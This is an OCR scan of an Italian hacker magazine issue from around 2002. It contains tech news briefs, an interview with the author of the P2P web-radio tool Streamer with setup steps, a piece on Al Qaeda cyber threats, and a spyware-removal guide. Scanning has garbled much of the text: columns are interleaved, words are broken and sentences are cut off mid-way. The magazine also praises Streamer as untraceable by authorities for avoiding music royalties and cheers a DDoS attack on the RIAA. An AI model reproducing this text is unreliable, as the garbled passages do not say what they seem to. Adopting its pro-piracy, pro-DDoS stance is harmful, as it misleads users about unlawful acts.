€0,84(1600 lire) 
€1,35 (2600 lire) 
€ 2,04 (3950 lire) 
3% del prezzo 
3% del prezzo 



10 | www.hackerjournal.it 



NEUS 



O SICUREZZA ASSOLUTA 



□ 




O I CELLULARI AL SERVIZIO DEI RIBELLI □ 



/l ministero delle comunicazioni indiano po- 
trebbe impedire l'estensione delle 
rete cellulare nel nord ovest del 
paese, per paura che i gruppi di indipen- 
dentisti li utilizzino per coordinare le proprie 
azioni. Non meno di 50 gruppi di guerri 
glieri, infatti, lottano attivamente in que 
sta zona a maggioranza musulmana. At- 
tualmente i ribelli devono lasciare la 
giungla in cui combattono e cercare 
un telefono pubblico per fare le loro 
telefonate. "Quando avranno a dis 
posizione i telefoni cellulari, potran- 
no facilmente parlare ai loro capi 
dalla giungla e condurre le loro 
operazioni senza paura", ha di 
chiarato il generale J.S.Verma, 
comandante delle regione Est, 
all'agenzia Reuters. 
Provate a pensare a quale 
reazione potrebbe esserci 
da noi se accadesse qual- 
cosa di simile: abituati co- 
me siamo a usare il cellu 
lare per ogni banalità, 
una notizia simile 
potrebbe davvero 
provocare una ri- 
voluzione... CJ 




Si, è possibile ed è appe- 
na stato dimostrato da | 
un istituto svizzero, colle- 
gando due PC attraversol 
un cavo in fibra ottica. Il | 
problema è la distanza limi- 
tata. Alcuni ricercatori sviz- 
zeri hanno potuto stabilirei 
un record di distanza di 67 
Km! La particolarità di 
questa tecnica è che 
ciascun bit di infor- 
mazione viene tra- 
sportato da un solo 
fotone. Ogni tentativo di | 
intercettazione quindi por- 
terebbe necessariamente I 
all'interruzione del segnale 
(se il singolo fotone viene 
intercettato, non può più 
arrivare a destinazione) , e 
sarebbe immediata- 
mente individuato e | 
contrastato, ej 



RADUNO HACKER A CELLATICA 
(BS) 

Vorrei segnalarvi un 
V piccolo incontro che sto 
organizzando qui nel mio 
^ paese nella provincia di 
Brascia!!!! (CELLATICA). 
Vorrei riunire tutti gli 
ti/ hacker e newbie della 
provincia e nonn per 
scambiare delle opinioni e 
approfondire quello che già' 
si sa sull 'hacking! ! 
Per dare la possibilità' anche 
a chi di hacking non se ne 
intende di capirci qualcosa di 
più' e stare un po' in 
compagnia! visto che di 
meeting se ne fanno ben pochi. 
Ho intenzione di organizzarlo 
per il Efl settembre qui a 
Cellatica!!! 
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O VIRUS, DIFFUSIONE 
FINALMENTE IN CALO 

Per la prima volta nell'anno, tra il giugno e 
il luglio scorsi, il numero di virus è 

diminuito. Dopo un inizio d'anno molto ca- 
rico, sembrerebbe che ci sia stata una tregua 
estiva che potrebbe risultare da una presa di 
coscienza da parte degli utenti che comincia- 
no a dare sempre più importanza alla sicurez- 
za e in particolare agli antivirus. Alcuni però 
stimano che questo potrebbe essere il risul- 
tato del fatto che, semplicemente, la gente 
utilizza meno il PC durante l'estate. m 



O PERÙ: IL LOBBISMO 
DI MICROSOFT 

Spaventata dall'annuncio del governo peru- 
viano di favorire l'open source, Microsoft 
fa grandi pressioni sull'ambasciato- 
re americano a Lima affinché quest'ulti- 
mo sostenga la sua causa e freni gli ardori del 
governo. Malgrado questa aperta pressione da 
parte di Microsoft, il governo peruviano non 
sembra per il momento cambiare opinione. Po- 
co elegantemente, Microsoft ha ricordato che 
potrebbe rappresentare 15.000 lavoratori per il 
Perù. Una procedura per niente elegante ma 
che non stupisce più... m 



O GIOCOSA 
AAACCHINA DA GUERRA 

/l nostro Dreamcast non è più inoffensivo. 
Un gruppo di hacker è riuscito a modificare 
certe funzioni del Dreamcast per trasformar- 
lo in un modulo di attacco. In questo modo si 
potrà trasformare in uno zombie, un compu- 
ter controllato da remoto allo scopo di pene- 
trare in una rete aziendale o portare attacchi 
DDoS. Una manipolazione che potrebbe elu- 
dere la sagacità di alcuni firewall. m 



O LE RADIO WEB 
UCCISE DALLA RIAA 

i yi partire dal 20 ottobre potrà essere se- 
| tignata la fine delle radio Web. Grazie alla 
RIAA (o a causa sua), che ha già avuto la 
testa di Napster, le radio Web dovranno 
pagare milioni di dollari di royalty 
(0,14 cent per pezzo e per ascoltatore). Se 
questa legge viene adottata, possiamo di- 
menticarci le radio sul Web. m 



O DISCOGRAFICI: LICENZA DI HACKERARE 



□ 



niegli Stati Uniti è stata depositata una pro- 
I II posta di legge per permettere ai produtto- 
ri di cinema e di musica di piratare legalmen- 
te le reti peer-to-peer. I detentori dei diritti 
(autore, editore, ecc.) potranno quindi attac- 
care una rete o introdursi in essa quando ab- 
biano un "ragionevole sospetto" che siano 
presenti copie illecite nelle "reti di scambio di 
file peer-to-peer accessibili al pubblico" so- 
spettate. In breve, carta bianca per pira- 
tare tutto ciò che desiderano con il solo 
pretesto che esista un "ragionevole so- 
spetto" (hum... anche da loro sono alle prese 
con queste faccende). Tutti possono sospetta- 
re di tutto, una persona potrebbe benissimo 
dire di pensare che su uno dei PC di una rete 
della Nasa ci siano degli MP3 e per questo ha 



attaccato il server dell'agenzia americana... 
Tutti potranno arrogarsi questo di- 
ritto, che non si basa su niente e si- 
curamente non su una parvenza di prova. 
Quindi, riassumendo, ad alcuni tutto è per- 
messo con la copertura della giustizia, ma la 
pena per i comuni mortali per lo stesso atto è 
il carcere a vita. Viva lo zio Sam! 
Qualche giorno dopo la presentazione al 
senato americano della legge che autorizza 
l'attacco delle reti Peer to Peer (Kazaa, 
Morpheus, ecc.) con tutti i mezzi tecnologici 
possibili, il sito della RIAA 
(www.riaa.org) ha subito un'onda di 
attacchi di negazione di servizio per 
tre giorni. Un avvertimento che i Pirati sono 
pronti a reagire... M 







yittualmente Microsoft cerca di reclutare 
rrun gruppo di ricercatori e di esperti 

per migliorare e rafforzare le sue ricerche in ma- 
teria di sicurezza, specialmente per i suoi nuovi 
prodotti basati sulla tecnologia .NET. Tra l'altro, 
Microsoft ha annunciato la creazione del Trust- 
worthy Computing Academic Advisory Board, 
che riunisce da 12 a 15 collegi e università per 
contribuire a questo lavoro di ricerca e sviluppo. 
Le università di New York, Cornell o di Los An- 
geles hanno accettato di partecipare-^ 
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O GUERRA DIGITALE TRA UNIVERSITÀ 



Stephen LeMenager, direttore delle ammissioni al- 
l'università di Princeton, ha ammesso di essere 
penetrato illegalmente nel server dell'università 
concorrente, Yale. Ne voleva saggiare la solidità... Di fatto 
voleva accedere ai dossier di una dozzina di candidati che le 
due università si contendono, per poterli convincere. Tra di loro 
la nipote di Bush, top model a tempo perso. Tutti i mezzi sem- 
brano buoni per reclutare i migliori allievi e la pirateria viene ora 
effettuata anche a livello istituzionale... cj 



O NETART IN MOSTRA AD ANCONA 




Ancona - [tal 



MrtM 



i a li so ? i 



«al 18 al 22 settembre si svol- 
i/gerà ad Ancona la prima 
edizione del Festival Italia- 
no di Net.Art BananaRAM. 

Negli spazi storici della Mole 
Vanvitelliana si potranno ammi- 
rare installazioni, performance e 
dibattiti sulle sperimentazioni ar- 
tistiche che si servono di Inter- 
net. Tutte le info le trovate su 
www.bananaram.org 



INFEZIONI IN 
CORSO 

Ecco la classifica 
dei 1D virus più' 
attivi durante le 
scorse settimane 
secondo RAV 
Antivirus- 



li 
2 
3 
^ 
S 
b 
7 

a 

10 



HTML/IFrame Exploit* 
Uin32/Klez.Hamm 
Uin32/Yaha-Famm 
Uin32/Sircamamm 
Uin32/Klez.Eamm 
Uin32/Hagistr-Bamm 
I Worm/Hybris-C 
Uin32/Nimda.Eamm 
Uin32/Hagistr -Aaron) 
lin32/Desos.Aamm 



O IL PENTAGONO LIMITA L'UTILIZZO DELLA TECNOLOGIA SENZA FILI 



a piacimento, prendere informazioni. Il Pentagono 
limita dunque l'uso di tali tecnologie, imponendo 
severe restrizioni a chi lavora al Pentagono. Da 
questo momento quindi PDA, cellulari e 
computer portatili sono vietati per un cer- 



to numero di funzionari. Le nuove regole dovranno | 
entrare in vigore da qui a un mese secondo il re- 
sponsabile delle comunicazioni del Pentagono. Un | 
cambiamento di mentalità sorprendente, dal mo- 
mento che il wireless ha grande successo, rà 



□ 
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Dauanti ai tentatiui di regolamentazione e di intromissione in tutto eie 
contrapporsi alle grandi major del "tutto in uendita". L'ultima incarnazi 
nasconde dietro a questo nome che euoca fortemente lo streaming (tecni 



I iaggiamo in questo ambiente 
HI J non senza ricordare il fenomeno 
I I c ' e " e rac '' ''libere" negli anni 
I I Settanta. Con la comparsa di 
^^^B stazioni di diffusione pirata 
^^| | online abbiamo trovato in una 
chat line l'uomo all'origine di questa cyber 
rivolta, lain McLeod. 
39 anni, musicista nell'anima ma 
sviluppatore di videogiochi nella vita 
quotidiana, questo inglese segue la 
linea che ha fatto espandere 
Napster: la musica per tutti, 
gratuitamente, e l'allontanamento 
dalle grandi società che 
gestiscono la musica. 
Per questo rivoluzionario non è 
possibile lasciar passare ciò che 
accade su Internet senza reagire. 
Immediata è stata quindi la sua 
reazione alla legge votata dal 
congresso americano per fissare le 
quote che devono pagare le radio 
online. Somme troppo onerose, 
che hanno come effetto 
immediato la chiusura pura e 
semplice di numerose radio sul Web. 
Secondo questa legge le radio devono 
pagare un minimo di 0.0007 € per 
ascoltatore e per canzone trasmessa. 
Questo rappresenta grosso modo 7 € al 
mese per ascoltatore per una piccola 



stazione a cui si devono aggiungere 500 € 
di forfait di base obbligatori. Un costo 
troppo alto, 




invece riservati alle tradizionali radio via 
etere. Lui ha quindi messo a punto un 
piccolo software, Streamer, che permette 
agli internauti di creare la propria 
radio online in modo semplice e, 
soprattuto, non rintracciabile da 
parte delle autorità! 



specialmente se confrontato con i costi 
decisamente più bassi e forfettari che sono 



ome installare e usare Streamer 



leamer e ancora un programma in 
versione beta, ha una documentazione 
un po' scarna e potrebbe non 
funzionare con tutte le configurazioni. 
Nel nostro caso non ha voluto saperne 
di funzionare su un Lan, dietro a un 
firewall, ma è andato senza troppi 
problemi con una normale connessione 
modem. 



Se non lo avete già, scaricate lo prima 
WinAmp (da www.winamp.com) di installai 



o un programma analogo che per- 
metta di ascoltare musica trasmessa 
su Inter- 
net e che 
riconosca 
come pro- 
pri i file 
con esten- 
sione .pls. 
Installate- 
lo prima 
di installare Streamer. 



i 



amer. era vuota). 



» Una rete parallela 
in piena esplosione 

Streamer, anche se rivoluziona 
completamente le possibilità of- 
ferte agli appassionati di musica 
online, non è affatto una sorpre- 
sa in quanto tale. E il risultato 
diretto del lento ma conti- 
nuo movimento di quella 
parte della Rete che rifiuta 
un'Interne! puramente com- 
merciale. Sono già cinque anni 
che Shoutcast ha cominciato, e da 
allora le tecnologie sono conside- 
revolmente migliorate. Anche se an- 
cora ha molti bachi, Streamer si basa 
sul principio che mantiene in vita siste- 
mi come Gnutella: il fatto di non avere 
bisogno di server centrali, cosa che 
all'epoca aveva provocato la chiusura di 
Napster e provea oggi la paralisi di Au- 
dioGalaxy... 

Il sito di lain McLeod: 

www.chaoff'ca.u-nef.com 



Dal sito di Streami 
http://www.chaotica.u- 
net.com/page/ streamer.htm, 
scaricate il file streamer.zip e scom- 
pattatelo in una posizione qualsiasi 



Fate doppio clic 
sull'icona di 
Strame r.exe 
(nella nostra 
versione, l'icona 
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ciò che riguarda la musica in linea, tutta una rete underground si sta organizzando per 
azione di questa resistenza che arricchisce i Morpheus, Kazaa o altri è Streamer! Ma chi si 
cnica che permette di caricare in tempo reale i file sonori da Internet)? 



» Internista a 
lain McLeod 

HJ > Perché hai svi- 
luppato Streamer? 

IML > L'idea mi è venuto 
quando ho sentito par- 
lare di un server che 
non aveva sopportato 
l'afflusso di internauti 
durante una diffu- 
sione online. Allora 
mi sono detto: per- 
ché non utilizzare 
la banda di ogni 
PC invece di quella di un solo 
server? All'inizio non pensavo che avreb- 
be avuto tanto successo, ma dopo la messa 
in vigore del pagamento di royalty esorbitan- 
ti per la diffusione online, ho accelerato lo svi- 
luppo per lottare contro questo scandalo. 

HJ > Pensi che ci sia una vera 
minaccia? A che livello? 

IML > Non credo che ci siano dei rischi fisici, 




se è questo che vuoi dire :-) Il codice 
sorgente è stato subito diffuso, quindi è 
troppo tardi per fermarlo: è il principio del 
peer to peer. Tuttavia devo dire che ho 
avuto un po' di panico quando ho 
visto la prima notizia riguardante 
Streamer pubblicata sul sito 
slashdot insieme al suo codice 
sorgente. Con la RIAA, tutto è 
possibile :-( 



! 



RIAA: Recording IndustryAsso- 
ciation of America, associazione 
di difesa degli interessi dell'indu- 
stria musicale nell'America del 
Nord. 



Se usate un firewall (in que- 
sto caso, ZoneAlarm), dovre- 
te impostarlo per concedere 



a Streamer la possibilità di collegar- stra velocità 



"...IO SONO SEMPRE 
STATO UN FAN DELLE 
RADIO PIAATA" 

> lain McLoud 



HJ > Credi che Internet diventerà un 
media puramente commerciale, a 
discapito della natura libertaria che 
l'ha caratterizzata per anni? 

IML > Certe persone in effetti spingono in 
questa direzione, sicuramente nel loro 
interesse. Ma Internet non potrà essere 
commerciale. "Vuole" essere aperta, non 
censurata e libera, è così che funziona. E 
poi, quando si parla di commercio si pensa 
sempre ai soldi, ma esistono altre forme di 
scambio: per esempio, ci può essere una 
forma di baratto. 



Quando si apre la finestr 
Stramer, fate clic sul pulsan- 
te Configure e inserite la vo- 



si a Internet e anche di agire come 
server (tranquil- - 
li, essendo rila- 
sciato sotto li- 
cenza Gpl, si 
può stare tran- 
quilli: non ci so- 
no Spyware). 



■ IV Jf# J VV VII *^« V^^^^^^^HK^ ^=^^MB* 



di collega- 
mento a In- 
ternet nei 
campi Down- 
load Speed e 
U p I o a d 
Speed. Nel ce 
dem i valori - 
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HJ > Oggi la musica rappresenta 
molto denaro, cosa ne pensi della 
distribuzione gratuita di essa 
attraverso gli MP3 grazie alle 
tecnologie P2P? 

IML > Se le società di musica non facilitano 
la distribuzione di MP3 attraverso la Rete, la 
gente crea le applicazioni che le permettano 
di farlo. La prima volta che ho scoperto 
Napster, sono stato collegato 48 ore... Non 
è necessariamente una questione di costi; la 
cosa più interessante di Napster era la 
possibilità di trovare tutto ciò che ci 
interessa. 

All'epoca della distribuzione gratuita e 
illimitata di musica online, i prezzi eccessivi 
non hanno più motivo di esistere. Le case 
discografiche e i loro sbirri come RIAA & Co 
vogliono perseguire le decine di milioni di 
consumatori che utilizzano i servizi p2p? Si 
lamentano di miliardi di file scambiati in Rete 
grazie ai diversi software p2p, ma tali cifre 
non indicano che esiste una fortissima 
domanda di questo tipo di prestazioni? La 
gente è pronta a pagare una cifra 
ragionevole per utilizzare questo tipo di 
servizi, lo fa già per la connessione a Internet 
e per comprare i CD vergini per registrare i 
file MP3. Se si tratta di una cifra mensile 
equivalente a ciò che in media spende la 
gente per comprare dei CD musicali nei 
negozi, funzionerà molto bene e non 



42; con Isdn 64 e 64, con Adsl 640 e 
128. 

Nella parte sinistra dello 
schermo, dovrebbe ora appa- 



una lista 
delle sta- 
zioni dispo- 
nibili. An- 
lale mo- cora non 
ere 33 e sono tantis- 
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p2p: Peer to Peer, connessio- 
ne punto a punto attraverso un 
server centrale o una connes- 
sione diretta. Questo tipo di tec- 
nologia è molto utilizzata da 
Napster, Kazaa, ecc. per lo scambio di fi- 
le MP3, DivX, ecc. 



perderanno più denaro! Sono dei cattivi 
uomini d'affari! 

HJ > Su quali tecnologie si basa 
Streamer? Perché la scelta dell'operi 
source ? 

IML > Di fatto ho appena inventato le 
"tecnologie" necessarie. Diffondere 
segnale in p2p, al posto del protocollo 
TCP/IP in modalità full duplex, e 
accoppiarlo con un metodo di 
riconoscimento dei PC che hanno 
Streamer per trovare il segnale. 
Tutto questo non era così ovvio 
come si potrebbe pensare... Ho 
fatto la scelta dell'Open Source 
soprattutto per proteggermi. Ma è 
vero che ne amo il concetto, inoltre 
l'idea dello streaming p2p è un 
concetto talmente fondamentale che 
non può che essere offerto a tutti. 



"controllerà" ciò che possiamo fare con 
esso, quale musica possiamo ascoltare, 
quali film possiamo vedere. 
E come la fantascienza: gli uomini in nero 
hanno intrapreso una vera guerra, cercando 
di far tacere la musica indipendente, in 
modo che non possiamo ascoltare altro che 
la loro musica. Hanno evidentemente 
"comprato" la legge per poter realizzare 
questo 



esto modo l'unica 
soluzione sarà "hackerare" il 

nostro PC, altrimenti luì 

'controllerà" ciò che possiamo 

fare con esso, quale musica 

possiamo ascoltare, 
quali film possiamo uedere. 



Sei già stato minacciato? 

IML > No. "Quando gli uomini buoni non 
fanno niente, il male trionfa". 
Dobbiamo opporci a loro, altrimenti il futuro 
sarà grigio e poco felice. Da parte mia, non 
faccio assolutamente niente di illegale, 
Streamer è un semplice sistema di diffusione 
radio via Internet... 

E in ogni caso, essendo nel Regno Unito non 
dipendo dalla legislazione americana. Ho 
scritto un programma che gioca con la 
musica, no? Se ho qualcosa da temere per 
questo, c'è qualcosa che non va. 
Non ho ancora ricevuto minacce ma questo 
non farebbe che rafforzare le mie 
opinioni e non impedirà la nascita di 
altri programmi basati sul p2p. La 
RIAA ha potuto fermare Audiogalaxy, 
ma io non mi preoccupo troppo per 
me stesso, sono lontano. E 
Streamer è Open source... 



HJ > Cosa pensi della situazione 
underground ? Pensi che oggi 
esistano due Internet? 

IML > È sempre stato un po' così. Purtroppo 
tutto ciò che non porta denaro alle aziende 
è quasi sistematicamente etichettato come 
"underground". E questo peggiora con la 
nuova legge americana in preparazione che 
possiamo qualificare come fascista, in cui il 
minimo movimento potrà essere controllato. 
Una nuova legge ispirata dal mondo degli 
affari (si devono realizzare acquisti, grazie a 
regali finanziari ben mirati) che va contro la 
volontà e gli interessi delle persone normali. 
In questo modo l'unica soluzione sarà 
"hackerare" il nostro PC, altrimenti lui 




obiettivo e 
desiderano subito una seconda legge che 
consenta di installare tecnologie di 
sorveglianza sui PC per impedirci di 
raggirare la legge. Leggi contro la musica. 
Pensiamoci un po'... 

HJ > Tu sei un pò 7 un pirata delle 
onde, sei spaventato da queste 
grandi organizzazioni come la RIAA? 



HJ > Prevedi nuove versioni 

di Streamer e consideri la 

possibilità di lavorare con un 

gruppo per migliorarlo? 

Prossime tappe? 

IML > Attualmente ci lavoro 

costantemente, quindi ci saranno 

altre versioni. Serve una versione 

adatta" e senza bachi in modo che sia 

più professionale e più funzionale. Un look 

migliore e un approccio più Windows 

faranno in modo che la gente si trovi a 

proprio agio. 

Questo mi dovrà ugualmente spingere verso 
versioni derivate che proporranno servizi a 
pagamento. Sto diventando un po' un 
"guru" in questo ambiente e, devo 
ammetterlo, non mi dispiace. 
Da semplice sviluppatore di videogiochi, che 
cerca di vendere la sua creazione, "Spheres 
of Chaos" attraverso il suo sito, mi si offre 
una nuova promettente strada. m 



i IJ iìMìiIIéUiiUiìéLiJ hi iitm iLJAlikiftiLJLkUj 



sime, in ogni caso dovrebbero aggi- 
rarsi almeno sulla decina di diverse 
radio. Fate doppio clic su una delle 
voci, scelta in base alla descrizione. 



6 



Stramer lancerà WinAmp (o 
un altro programma analo- 
go), che si collegherà alla 
stazione radio, che comincerà ad 
essere riprodotta. Come potete no- 
tare, WinAmp si collega in realtà al- 
l'indirizzo 127.0.0.1, che è il vostro 



computer. Questo perché Streamer 
si comporta come un Server, che "ri- 
flette" il canale su cui si è sintonizza- 
to, e così facendo permette anche ad 
altre persone di collegarsi al nostro 
computer per ascoltare la radio. 
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passato un anno da 
quando i seguaci di Bin 
Laden hanno contrasse- 
gnato l'inizio del ventu- 
-I nesimo secolo con il 
marchio dell'infamia. Dopo infiniti 
rumori, scoop veramente falsi e ta- 
glie sempre più alte, si può fare un 

" ìe... 

Qualche mese fa un militante di Al 
Quaeda è stato arrestato e ha det- 
to che l'organizzazione ha fatto ri- 
corso a specialisti informatici, e dis- 
poneva di mezzi per attaccare le in- 
frastrutture online. Un discorso 
ascoltato dall'FBI, ma che si inseri- 




à 



"Oggi sappiamo che Al Quaeda può attaccarci 
online, ha passato più tempo a studiare le 
nostre vulnerabilità nel cyberspazio di 
quanto avessimo pensato. Il problema non è 
sapere se 1 attacco avrà luogo, ma quando." 
Roger Cressey, specialista in antiterrori- 
smo, consigliere del presidente americano. 



zona molto ambita, ma anche a 
celle utilizzate dagli amministratori 
locali. Questo non è sfuggito al de- 
tective specializza- 
to in criminalità hi- 
tech, che ha avver- 
tito l'ufficio dell'FBI 
a San Francisco. Al 
termine di una ra- 
pida inchiesta con- 
dotta di concerto con gli esperti del 
laboratorio Lawrence Livermore, è 
apparso chiaramente che numerosi 
siti americani erano stati oggetto di 
un'attenzione molto particolare da 
parte di internauti collegati da Ara- 
bia Saudita, Indonesia e 
istan... Questi av 
oncentrato la I 
ione sui sisterr 
*a d'urgenze 



■pne 



diato eventuali attacchi accoppiati 
online e offline per provare, se ne- 
cessario, a disorganizzare i soccor- 



n L avvenimento che temo di più è un attacco fisi- | 
co combinato con successo con un attacco riuscito 
contro il 911 (ndr: numero di telefono dei pom- 
pieri negli USA) "Ronald Dick, direttore del cen- 
tro di protezione delle infrastrutture dell' FBI 

12 giugno 20021 



si attaccando le chiamate d'urgen- 
za e impedendo l'assistenza. 
Nonostante sembrino esserci tenta- 
tivi per sabotare tali servizi, alcuni 
sono più prudenti rispetto all'im- 
magine del Ministero della difesa 
americano sul potere reale di dan- 
neggiamento da parte di terr 
nel cyb^Bpazio. Al contrario, li 
sa BioM He l'FBI parlano di e 
|n termini molt 
uè visioni in cui 



una serie di. minacce ine 
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I TUOI DATI PERSONALI SONO IN PERICOLO 



La diffusa pirateria del software, o la semplice smania di guadagni, ha spinto i 
produttori di shareware a trovare un'altro oggetto da vendere: i dati personali dei 
loro utenti. Scoprite con noi cosa sono e come funzionano i programmi Spyware, 
che permettono*! network pubblicitari di monitorare e registrare le 
itudini di navigazione di persone spesso ignare 



I è scaduto" e che "occorre acquistare 
LHicenza e registrare il pro- 
mma" per poterlo continuare ad 
utilizzare liberamente. Tuttavia con 
un crack scaricato da qualche sito 
warez, qualche modifica al registro 
o, più semplicemente, la reinstalla- 
zione del programma è sempre 
stato fin troppo semplice evitare di 
registrare gli shareware. 



» Marta la shareware... 



Di fronte a tutto questo, program- 
matori e software house hanno 
molto spesso dovuto abbandonare 
la strada dello shareware per per- 
correrne altre più redditizie. Q^j 
quindi che molti programmi si fono 





££ 



glese ad - abbreviazione di 
tisement, ovvero inserzione [ 




terno del programma vengalo vi- 



olti tra voi, per non 
dire quasi tutti, 
avranno almeno 



— I una volta provato 
ad installare un programma (ma- 
gari scaricato da Internet o trovato 
su qualche CD) di tipo shaami 
ovvero utilizzabile gratuitamé 



per un limitato periodo di tempo 
(solitamente 30 giorni) o per un 
certo numero di volte o con un ri- 
stretto numero di funzjpni... Scadu- 
to perciò il periodf4n prova, ecco 
che fastidioyifmestre compaiono 
rosi di ricordare all'u- 
nte che "il periodo a disposizione 



percepisce un compenso inpoase al 
numero di esposizioni e di clic sui 
banner stessi. In linea di massima il 
sistema utilizzato è il medesimo 
che viene applicato ai banner pre- 
senti nelle pagine Web ef in questo 
modo, il programmato» guada- 
gna quella cifra che nessuno altri- 
menti gli avrebbe pagato. Da que- 
sto punto di vista Operi è un caso 
emblviPPBMOTMltHpMPrie versioni, 
shareware, ricevettero una tiepida 
accoglienza tra i navigatori ma a 
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partire dal dicembre 2000, con il ri- 
lascio cioè della quinta versione 
non più shareware bensì "sponso- 
rizzata", il numero degli utenti è 
cresciuto a dismisura. Volendo per- 
ciò riassumere, quando vi collegate 
in rete l'adware scarica i banner 
pubblicitari che verranno poi visua- 
lizzati a rotazione nella finestra del 
programma che li ha richiamati; e 
fin qui tutto bene. In questo caso il 
passaggio di dati è praticamente 
unidirezionale: dal server al pro- 
gramma. 



» ...il software inizia 
a spiare 

Le aziende però cercano di sfrutta- 
re il più possibile ciò di cui dispon- 
gono, anche se questo implica una 
violazione della privacy degli uten- 
ti. Perchè ^limitarsi a esporre ban- 
""tazione, quando è invece 
attuare campagne mirate 
se agli interessi degli utenti? 
co che allora si è iniziato ad inse- 
rire una sorta di "programma nel 
programma" avente come unica 
funzione quella di spiare le perso- 
ne, raccogliendo informazioni sul 
loro conto e inviandole a un appo- 
sito server. Siamo perciò giunti ad 
identificare il punto cruciale che di- 
stingue la tecnologia adware da 
quella Spyware: nel primo caso la 
comunicazione avviene solo in un 
senso, e abbiamo un'esposizione di 
banner, mentre nel malaugurato 
caso i cui invece la comunicazione e 
la trasmissione di dati avvenga an- 
che dal programma al server (e 
quindi finisce con l'essere l'utente a 
mandare dati al server e non vice- 
versa) siamo in presenza di uno 
Spyware. In pratica queste "spie 
software" possono trasmettere ogni 
sorta di informazioni riguardanti i 



siti visitati e la permanenza su essi, 
i diversi download fatti e le azioni 
effettuate con il browser (inclusi 
eventuali acquisti on-line), la confi- 
gurazione dell'hardware, il softwa- 
re installato, il vostro nome come 
registrato nel file di registro di Win- 
dows (quello che inserite durante 
l'installazione) insieme, ovviamen- 
te, ai dati della vostra connessione 
(indirizzo IP ma anche provider e 
località in cui siete) e persino la vo- 
stra e-mail. Le informazioni 
che uno Spyware 
può ricavare so- p 

no quindi innu- 

■• I * 



ngono nvendu- | - 
te a caro prezzo a 
terzi dalle azien- 
de che se ne im- 
possessano. 
Spaventati da tut- ] 
to ciò? La para- 
noia sta prenden- 
do il sopravvento \ 
in voi favorita da >-*- 
questa atmosfera or- 
welliana da Grande Fratel- 
lo? Non temete... Dopotutt 
è abbastanza fatile, saper 
done leggere i sintomi, e 
pire se uno Spyware è pi 
sente sul vostro PC e allo Mes- 
so modo non è poi così dipale libe- 
rarsene. 

» Tanti i sintomi... 



"Ci sono H 1 



nascosti ^maliziosi" 



re la casella ^di posta intasata 
tonnellate dì spam (di cui alcuL 





volmente rallentato dopo che avete 
installato un nuovo programmino o 
se strani file continuano a tentare 
di aprire una connessione senza 
rho l'nntSwSi-nc rilevi la presenza di 
robabilmente 
uno Spyware è già installato sul vo- 
stro PC. Altri sintomi possono esse- 



chiamano persino per nome) o 
strani pdp-up che compaiono du- 
rante IjP navigazione, magari con 



guardanti il vostro hobby preferi- 
ifine occorre considerare che 
sti Spyware, residenti in me- 
oria, causano non pochi proble- 
mi originando conflitti con al- 
-- tri programmi e compro- 
■ mettendo la stabilità 
dell'intero sistema. Net- 
scape Navigator ad 
esempio si blocca pre- 
sentando errori nel mo- 
dulo Advert.dll, mentre 
con Internet Explorer 
5.01 avvengono degli er- 
rori casuali che bloccano 
il browser e l'unica solu- 
^ zione è riawiare il siste- 
ma (anche in questo caso 
il fenomeno è causato dalla li- 
breria Advert.dll). 
I programmi contenenti Spyware 
sono tantissimi (le liste di questi 
software sparse sui siti Web sono 
innumerevoli ed è sufficiente cerca- 
re "Spyware list" con un motore di 
ricerca per trovarne qualcuna) e tra 
questi spiccano nomi quali CuteFTF* 
FlashGet, GolZilla, Photocopier, 
Babylon, iPhone e quasi tutti i più 
diffusi programmi di file-sharing. 
Occorre però anche dire che talvol- 
ta solo alcune versioni meno recen- 
ti contengono Spyware mentre nel- 
le ultime release, magari sotto la 
pressione degli utenti, diverse case 
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Difendersi dai "biscottini" 

Il metodo più rapido per difendersi dai cookie è quello di non autorizzare il proprio 
browser a scaricarli; tuttavia questo comporterebbe un utilizzo assai limitato dei ser- 
vizi che la Rete offre poiché, ad esempio, è sempre uno di questi "bftottini" che per- 
mette al server di identificare univocamente l'utente e quindi abilita l'accesso a zone 
sicure e protette quali la casella e-mail on-line. Allo stesso modo, configurare il prò- 
prio navigatore in modo che richieda sempre l'autorizzazione prima di scaricare un 
cookie risulterebbe, a causa delle continue richieste, decisamente frustrante. Come 
dicevamo, in molti casi questi piccoli files hanno comunque una scadenza oltre la 
quale non vengono più considerati validi ma, non per questo, vengono rimossi dal 
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o\ sicuro 



g ro^ e 



hanno 
provveduto (almeno 
in parte) ad eliminarli o renderli 
"meno nascosti". 

» ...ma non mancano 
i rimedi! 

Come dicevamo prima, eliminare 
però questi software-spia non è poi 
oggi così difficile: esiste un pro- 
gramma appositamente studiato 
per questo scopo. Ad-Aware, prol 
dotto dalla Lavasoft è stato creatJ 
proprio per cercare e rimuovere 
programmi e file adware, pro- 
grammi e file Spyware, chiavi del 
registro di configurazioni sospette e 
cookie sospetti. Il suo utilizzo è de- 
cisamente intuitivo e i risultati sono 
straordinari. Una volta installato 
con pochi clic (la versione 5.8x è di 
poco inferiore ai 900Kb), Ad-aware 
è pronto per essere avviato. Sulla 
sinistra della schermata principale 
è possibile selezionare le periferi- 
che fisiche che si desidera fatui 
lizzare al programma, insieme 
viamente al registro di Windows e 



alla memoria mentre sulla destra 
tre grossi pulsanti consentono di vi- 
sualizzare i vari backup dei file so- 
spetti effettuati nel corso delle di- 
verse "pulizie" del sistema, di impo- 
stare le opzioni (non moltissime) o 
di avviare la scansione del sistema. 




per la vostra privacy o per io meno 
sospetti e, a questo punto, è possi- 
bile rimuovere tutti (o solo alcuni) 
di quelli segnalati dal programma, 
magari facendone prima una copia 
di sicurezza con la funzione bac- 
kup (fidarsi è bene, non fidarsi...). 
Sempre della stessa casa è anche 
RefUpdate, un piccolo tool che, 

"le aziende della neiu 
economy sono disposte a 
totto per un po' di soldi" 



) direttamente via Web l'ag- 
giornarhento del file di definizione 
di Ad-aware, permettendovi così di 
essere protetti anche dai più recen- 
ti Spyware. Una volta selezionato il 
server da cui volete scaricare gli 
aggiornamenti (e impostati even- 
tualmente dal menu Options i « 
parametri del proxy), dovrete 
semplicemente premere Con- 
nect e, una volta terminato il i i u 
tutto, avviare la scansione di 
Ad-aware aggiornato. 
Fino all'anno scorso esisteva an^ 
che OptOut, un altro program- I; 1 
ma avente la medesima funzio- 
ne di Ad-aware, ma il suo svi- 
luppo si è arrestat<*-^"i<* mnio I 
circolanti, oltre c"~ 
obsolete, nom*** 

iziorimrti tanto che lo stes- 
so Steve Gibson, autore per l'ap- 
punto di OptOut, invita i suoi 



e copie 
ere ormai 




» E i cookie doue li 

mettiamo? 

utenti ad utilizzare il software della 
Lavasoft sopra citato. 
In ogni caso nel grande Web sono 
andati via via aumentando i tra- 
nelli di cui le ditte della new-eco- 
